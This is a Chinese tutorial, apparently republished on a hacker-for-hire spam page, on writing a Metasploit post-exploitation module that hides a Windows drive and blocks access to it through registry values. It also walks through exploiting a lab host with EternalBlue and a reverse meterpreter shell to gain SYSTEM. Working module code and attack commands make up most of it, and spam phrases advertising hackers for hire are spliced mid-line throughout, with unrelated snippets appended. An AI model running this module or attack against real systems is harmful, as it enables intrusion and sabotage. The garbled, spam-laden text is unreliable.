完全免费接单子黑客 *** 免收订金-有关Metasploit5中的后渗透模块的编写与检测
后渗透模块,说白了是在取得成功渗透总体目标服务器以后开展实际操作的模块,这类模块能够做到某类或一些特殊的目地。在Metasploit中,模块是文件后缀名为.rb的文档,它是利用Ruby编写的程序流程。文中详细说明了怎样利用Ruby编写掩藏和禁止访问特殊控制器的后渗透模块、怎样在Metasploit中载入该后渗透模块及其怎样在meterpreter中利用该后渗透模块的全过程。
试验自然环境
1.渗透服务器:Kali-Linux-2019.1-vm-amd64
2.总体目标服务器:Windows Server 2008 R2
3.软件版本:Metasploit v5.0.2
编写后渗透模块
1.模块的第24小时接单子的黑客电話一部分以下所显示:
# This module requires Metasploit: https://metasploit.com/download
# This module is used to hide and restrict access to a particular drive
# after you have successfully penetrated a server
require 'rex'
require 24小时接单子的黑客电話 'msf/core'
require 'msf/core/post/windows/registry'
class MetasploitModule < Msf::Post
include Msf::Post::Windows::Registry
def initialize
super(
'Description'=> 'This module is used to hide and 24小时接单子的黑客电話 restrict access to a particular drive',
'License'=> MSF_LICENSE,
'Author'=> 'Neroqi',
)
register_options(
[ OptString.new('DriveCharacter',[true,'Please SET the Drive Character'])],
24小时接单子的黑客电話 self.class)
end
Metasploit的模块编写提议从注解刚开始,注解句子以“#”开始,注解可以提高模块的易读性,便捷别人和自身之后的阅读文章应用。
require ‘rex’导入了Metasploit中rex库的全部內容;require ‘msf/core’导入了Metasploit中core库的全部內容;require 24小时接单子的黑客电話 ‘msf/core/post/windows/registry’导入了registry.rb库文件,用以事后实际操作总体目标服务器的注册表文件。
class MetasploitModule < Msf::Post表示将该模块界定为Post种类,即后渗透模块种类。
方式initialize界定了模块的基本信息及主要参数,在其中register_options应用OptString.new函数定义了一个字符串数组自变量DriveCharacter,用以储存本地磁盘。
2.模块的第二一部分以下所显示:
def drive_converter(drive)
case drive
when "A"
return 1
when "B"
return 2
when "C"
return 4
when "D"
return 24小时接单子的黑客电話 8
when "E"
return 16
when "F"
return 32
when "G"
return 64
end
end
这一部分牵涉到本地磁盘掩码的测算全过程。其实不是很难,利用公式计算2^(N-1)就可以,在其中N为本地磁盘英文字母在26个英文声母表中的部位,例如C在声母表中的部位为3,因而回到2^(3-1)=4,别的本地磁盘依此类推。
因为 *** 服务器很有可能外挂软件存储阵列,因而本地磁盘很有可能不仅到英文字母“G” ,这一部分能够自主改动。
3.模块的第三一部分以下所显示:
def run
drive_int = drive_converter(datastore['DriveCharacter'])
registry_path = 24小时接单子的黑客电話 "HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer"
exists = meterpreter_registry_key_exist?(registry_path)
if exists
print_good("Registry Path Exists, Creating Values 24小时接单子的黑客电話 Directly!")
meterpreter_registry_setvaldata(registry_path, 'NoDrives', drive_int.to_s, 'REG_DWORD', REGISTRY_VIEW_64_BIT)
print_good("Hiding #{datastore['DriveCharacter']}Drive")
meterpreter_registry_setvaldata(registry_path,'NoViewOnDrive', 24小时接单子的黑客电話 drive_int.to_s,'REG_DWORD', REGISTRY_VIEW_64_BIT)
print_good("Restricting Access to #{datastore['DriveCharacter']}Drive")
else
print_error("Registry Path Doesn't Exist, Creating Path 24小时接单子的黑客电話 Firstly!")
registry_createkey(registry_path)
meterpreter_registry_setvaldata(registry_path,'NoDrives', drive_int.to_s,'REG_DWORD', REGISTRY_VIEW_64_BIT)
print_good("Hiding #{datastore['DriveCharacter']}Drive")
meterpreter_registry_setvaldata(registry_path,'NoViewOnDrive', 24小时接单子的黑客电話 drive_int.to_s,'REG_DWORD', REGISTRY_VIEW_64_BIT)
print_good("Restricting Access to #{datastore['DriveCharacter']}Drive")
end
print_good("Disabled #{datastore['DriveCharacter']}24小时接单子的黑客电話 Drive Successfully!")
end
registry_path = "HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer"
这里的HKLM表明注册表文件中的HKEY_LOCAL_MACHINE,可是那样缩写是不是行得通?Windows Server 2008 R2的注册表文件是下边那样的啊。
莫急,途径补齐的工作中早已有些人悄悄帮大家干了,在registry.rb库文件中有一段编码完成了此项工作中,实际以下:
def registry_hive_lookup(hive)
case hive
24小时接单子的黑客电話 when 'HKCR'
HKEY_LOCAL_MACHINE
when 'HKCU'
HKEY_CURRENT_USER
when 'HKLM'
HKEY_LOCAL_MACHINE
when 'HKU'
HKEY_USERS
when 'HKPD'
HKEY_PERFORMANCE_DATA
24小时接单子的黑客电話 when 'HKCC'
HKEY_CURRENT_CONFIG
when 'HKDD'
HKEY_DYN_DATA
else
HKEY_LOCAL_MACHINE
end
end
registry_path = 24小时接单子的黑客电話 "HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer"
这里是在注册表文件的HKLM(HKEY_LOCAL_MACHINE)中,这儿的HKLM还可以改动为HKCU(HKEY_CURRENT_USER)。这二者的差别取决于:在取得成功渗透总体目标服务器以后,若能够获得总体目标服务器的system管理权限,那麼就可以应用HKLM修改系统等级的注册表文件;若只有获得某一客户的管理权限,那麼委屈求全,应用HKCU改动当今客户的注册表文件。
exists = 24小时接单子的黑客电話 meterpreter_registry_key_exist?(registry_path)
用 于判断目标主机的注册表中是否存在该路径,为下面的if-else语句提供判断依据。
在Windows中通过创建NoDrives和NoViewOnDrive这两个注册表值,可以实现隐藏并禁止访问指定盘符。
我们的预期是在meterpreter会话中使用该后渗透模块,于是使用函数meterpreter_registry_setvaldata来设置NoDrives和NoViewOnDrive的值。由于目标主机是64位系统,24小时接单的黑客 *** 所以在meterpreter_registry_setvaldata函数中使用的是参数REGISTRY_VIEW_64_BIT;如果目标主机是32位系统,那么使用参数REGISTRY_VIEW_32_BIT。
测试后渗透模块
经过上面的步骤,后渗透模块的编写已经完成,接下来进行模块的测试。
1.将编写好的后渗透模块disable_drive_Neroqi.rb拷贝到如下路径:
/usr/share/metasploit-framework/modules/post/windows/manage
要将模块成功加载到Metasploit中,还需要在msfconsole中reload_all。若模块存在错误,那么msfconsole会返回详细的报错信息,然后根据报错信息相应地去修改自己的代码即可;若模块正确无误,则msfconsole的返回信息如下图所示(reload_all之前是326个post模块,之后是327个post模块):
2.使用nmap扫描目标主机,nmap命令如下:
root@kali:~# nmap -sV -p - --script vuln --script-args unsafe 192.168.110.130
发现目标主机中存在ms17_010的漏洞,扫描结果如下图所示:
3.为进一步确认目标主机中的ms17_010漏洞,防止nmap误报,我们在msfconsole中使用auxiliary/scanner/ *** b/ *** b_ms17_010模块,24小时接单的黑客 *** 确定ms17_010漏洞是否可以利用,操作如下:
msf5 > use auxiliary/scanner/ *** b/ *** b_ms17_010
msf5 auxiliary(scanner/ *** b/ *** b_ms17_010) > set RHOSTS 192.168.110.130
RHOSTS => 192.168.110.130
msf5 auxiliary(scanner/ *** b/ *** b_ms17_010) > run<24小时接单的黑客 *** br style="box-sizing: border-box" />
基本确认该ms17_010漏洞可以利用,确认结果如下图所示:
4.利用exploit/windows/ *** b/ms17_010_eternalblue模块对目标主机进行渗透,建立与目标主机之间的meterpreter会话,操作如下:
msf5 > use exploit/windows/ *** b/ms17_010_eternalblue
msf5 exploit(windows/ *** b/ms17_010_eternalblue) > set RHOST 192.168.110.130
RHOST => 192.168.110.132
msf5 24小时接单的黑客 *** exploit(windows/ *** b/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/ *** b/ms17_010_eternalblue) > set LHOST 192.168.110.132
LHOST => 192.168.24小时接单的黑客 *** 110.130
msf5 exploit(windows/ *** b/ms17_010_eternalblue) > set LPORT 8000
LPORT => 8000
msf5 exploit(windows/ *** b/ms17_010_eternalblue) > run
5.可以看到我们取得了目标主机的system权限,如下图所示:
6.对于情况未知的目标主机,可以使用post/windows/gather/forensics/enum_drives模块来枚举分区信息,为后续执行disable_drive_Neroqi.rb模块提供依据,在执行enum_drives模块之前,需要通过24小时接单的黑客 *** background将meterpreter会话转为后台运行,具体操作如下:
meterpreter > background
[*] Backgrounding session 1...
msf5 > sessions
Active sessions
===============
Id Name Type Information 24小时接单的黑客 *** Connection
-- ---- ---- ----------- ----------
1 meterpreter x64/windows NT AUTHORITY\SYSTEM @ WIN-3E5KJEFP436 192.168.110.132:8000 -> 192.168.110.130:49280 (192.24小时接单的黑客 *** 168.110.130)
msf5 > use post/windows/gather/forensics/enum_drives
msf5 post(windows/gather/forensics/enum_drives) > show options
Module options (post/windows/gather/forensics/enum_drives):
Name Current Setting 24小时接单的黑客 *** Required Description
---- --------------- -------- -----------
MAXDRIVES 10 no Maximum physical drive number
SESSION yes The session to run this module on.
msf5 24小时接单的黑客 *** post(windows/gather/forensics/enum_drives) > set SESSION 1
SESSION => 1
msf5 post(windows/gather/forensics/enum_drives) > run
Device Name: Type: Size (bytes):
------------ --24小时接单的黑客 *** --- -------------
\\.\PhysicalDrive0 4702111234474983745
\\.\C: 4702111234474983745
\\.\D: 4702111234474983745
\\.\E: 24小时接单的黑客 *** 4702111234474983745
[*] Post module execution completed
7.在msf中选择编写的后渗透模块disable_drive_Neroqi.rb,设置DriveCharacter和SESSION,其中DriveCharacter为盘符字母(此处设为D),SESSION为转为后台运行的meterpreter会话id(此处id为1),操作如下:
<24小时接单的黑客 *** p>msf5 > use post/windows/manage/disable_drive_Neroqimsf5 post(windows/manage/disable_drive_Neroqi) > set DriveCharacter D
DriveCharacter => D
msf5 post(windows/manage/disable_drive_Neroqi) > set SESSION 1
SESSION 24小时接单的黑客 *** => 1
msf5 post(windows/manage/disable_drive_Neroqi) > run
8.在设置好模块disable_drive_Neroqi的参数之后,run这个后渗透模块,输出信息如下:
9.登录到目标主机中,验证攻击是否成功,主机的注册表如下图所示,此时在注册表中NoDrives和NoViewOnDrive已经成功写入:
打开“我的电脑”,可以看到D盘已经消失,如下图所示:
在“磁盘管理”中尝试打开D盘,系统报24小时接单的黑客 *** 错,无法访问D盘,如下图所示:
结束语
以上这些,就是关于如何利用Ruby编写后渗透模块、如何加载以及利用后渗透模块的过程,大家有兴趣的话,可以尝试利用Ruby编写自己的渗透模块并且进行相关测试。
24小时接单的黑客 ****本文原创作者:Neroqi,本文属于FreeBuf原创奖励计划,未经许可禁止转载
80x86汇编小站:一个CC++汇编为基础的网站,学习黑客必不可少的基础语言.看雪学院:一个国内老牌破解逆向软件安全,聚集很多国内高手.一蓑烟雨:。免费接单黑客 *** 不收定金
专业找人公司可靠吗在全球的黑客名单中,凯文·米特尼克是更具传奇色彩的人物。好莱坞甚至把他搬上了银幕。在他15岁的时候,仅凭一台电脑和一部调制解调器就闯入了北美空中。
免费接单黑客 *** 不收定金1.威盾专家24小时接单的黑客 *** 认为,不管是个人主机还是企业的服务器,最重要的就是要把administrator的密码一定要设置的复杂一点,因为众所周知,入侵的之一步就是扫描,你。
超级特工系统|作者:笔之海|言情小说小说大学里被欺压了两年的叶泽明无意中从手机中下载到了一款逆天的超级特工系统,从格斗到射击、从潜入到心理学。
你在开玩笑吧。一个串号就能控制手机,那通过银行卡号不就能操作资金了么?那只是一串数字而已,和名字一样事实上很简单,他会先发个软件给你,当然不会直接发给你的,他会将它埋在附件中,当你打开附件的时24小时接单的黑客 *** 候就运行了这个软件(杀毒软件可能汇报,注意),他会自己。免费接单黑客 *** 不收定金
右击我的电脑-计算机管理-系统工具-性能日志和报警-跟踪日志,然后根据自己需要设置吧所谓黑客程序,是指一种无传染性的系统安全屏蔽程序。它被植入计算机系统,一旦黑客程序感染了计算机,便与黑客里应外合,使黑客攻击变得十分容易。现在的。
免费接单黑客 *** 不收定金哪有那么容易的事,而且能否控制摄像头与黑客技术、摄像头厂家、摄像头使用人都有关系,就目前而言,大品牌的摄像头在设置复杂密码的情况下应该是很难被控制。24小时接单的黑客 ***
标签:
版权声明
本文仅代表作者观点,不代表本站立场。
本文系作者授权发表,未经许可,不得转载。